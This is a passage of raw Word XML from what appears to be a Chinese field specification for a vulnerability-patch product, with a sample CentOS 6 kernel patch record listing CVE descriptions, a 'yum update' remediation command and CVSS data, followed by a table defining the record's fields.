        <w:t xml:space="preserve"> socket against the process limit. A local user could use this flaw to exhaust all available memory on the system. (CVE-2013-4312, Moderate) * A buffer overflow flaw was found in the way the Linux kernel's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virtio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-net subsystem handled certain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fraglists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> when the GRO (Generic Receive Offload) functionality was enabled in a bridged network configuration. An attacker on the local network could potentially use this flaw to crash the system, or, although unlikely, elevate their privileges on the system. (CVE-2015-5156, Moderate) * It was found that the Linux kernel's IPv6 network stack did not properly validate the value of the MTU variable when it was set. A remote attacker could potentially use this flaw to disrupt a target system's networking (packet loss) by setting an invalid MTU value, for example, via a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NetworkManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> daemon that is processing router advertisement packets running on the target system. (CVE-2015-8215, Moderate) * A NULL pointer dereference flaw was found in the way the Linux kernel's network subsystem handled socket creation with an invalid protocol identifier. A local user could use this flaw to crash the system. (CVE-2015-8543, Moderate) * It was found that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>espfix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> functionality does not work for 32-bit KVM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paravirtualized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> guests. A local, unprivileged guest user could potentially use this flaw to leak kernel stack addresses. (CVE-2014-8134, Low) * A flaw was found in the way the Linux kernel's ext4 file system driver handled non-journal file systems with an orphan list. An attacker with physical access to the system could use this flaw to crash the system or, although unlikely, escalate their privileges on the system. (CVE-2015-7509, Low) * A NULL pointer dereference flaw was found in the way the Linux kernel's ext4 file system driver handled certain </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">corrupted file system images. An attacker with physical access to the system could use this flaw to crash the system. (CVE-2015-8324, Low) Red Hat would like to thank Nadav Amit for reporting CVE-2010-5313 and CVE-2014-7842, Andy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lutomirski</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for reporting CVE-2014-8134, and Dmitriy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Monakhov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OpenVZ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) for reporting CVE-2015-8324. The CVE-2015-5156 issue was discovered by Jason Wang (Red Hat). Additional </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Changes :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> * Refer to Red Hat Enterprise Linux 6.8 Release Notes for information on new kernel features and known issues, and Red Hat Enterprise Linux Technical Notes for information on device driver updates, important changes to external kernel parameters, notable bug fixes, and technology previews. Both of these documents are linked to in the References section.",                              //补丁描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     "check": {                              //校验信息</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">         "details": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">             {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "centos-6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "name": "kernel",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fixVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2.6.32-642.el6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                  "version": "2.6.32-431.el6"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">             }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedCmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yum update -y kernel"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "这个补丁修复了Red Hat Enterprise Linux 6 kernel的多个漏洞，本地攻击者可利用该漏洞耗尽系统所有可用内存、使系统崩溃甚至提升权限。漏洞修复后需要系统重启。建议业务不繁忙时修复。",         //修复建议</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remedCmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> yum update -y kernel",                               //修复命令  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>独有</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installPackage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,                                            //安装包地址, windows有</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvssScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "7",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cvssDetail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "AV:L/AC:M/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Au:N</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/C:C/I:C/A:C",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ref": "CVE-2010-5313,CVE-2013-4312,CVE-2014-7842,CVE-2014-8134,CVE-2015-5156,CVE-2015-7509,CVE-2015-8215,CVE-2015-8324,CVE-2015-8543",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>restartOpts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isKernel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isLocalEscalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isRemote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasPoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocRefs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "impacts": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime":"2016-05-16 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "businessImpact":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11754614"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846"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5685"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3DF2CCD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B0E1BDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4750131A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F9A529" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3541F222" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="315036B3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26A8CFFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>patchId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353FD0C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C3896FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5205530F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B4EC761" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D4F391B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>kbNum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="134EB6F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DCE332A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A8DC1BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kb号 （仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D87EAB3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0843ABFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bulletId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27298A8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB569A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>char(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA27C50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公告号（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7EF8AE7F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32437C37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>patchName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620123BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60C52117" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05934CDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5739361A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254B33C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="510E13A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24152758" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A93127D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>危险程度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F897997" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48DD647A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>publishTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70647EC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A6065B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F2A2991" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁发布时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58FF86FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680A6E7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="733DD367" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25E40B62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="389576E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>影响的app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F06929B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DEA502E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>desc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0112DE5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE94D9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50531983" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34DCE700" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A32F9E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70A92811" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="247313A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DC4E047" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁校验信息（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20A2C74A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1996B15C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="451EDF67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C6D491C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="179A9715" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>校验信息详情(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BDD6E0D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FC42060" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remedCmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421AC915" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
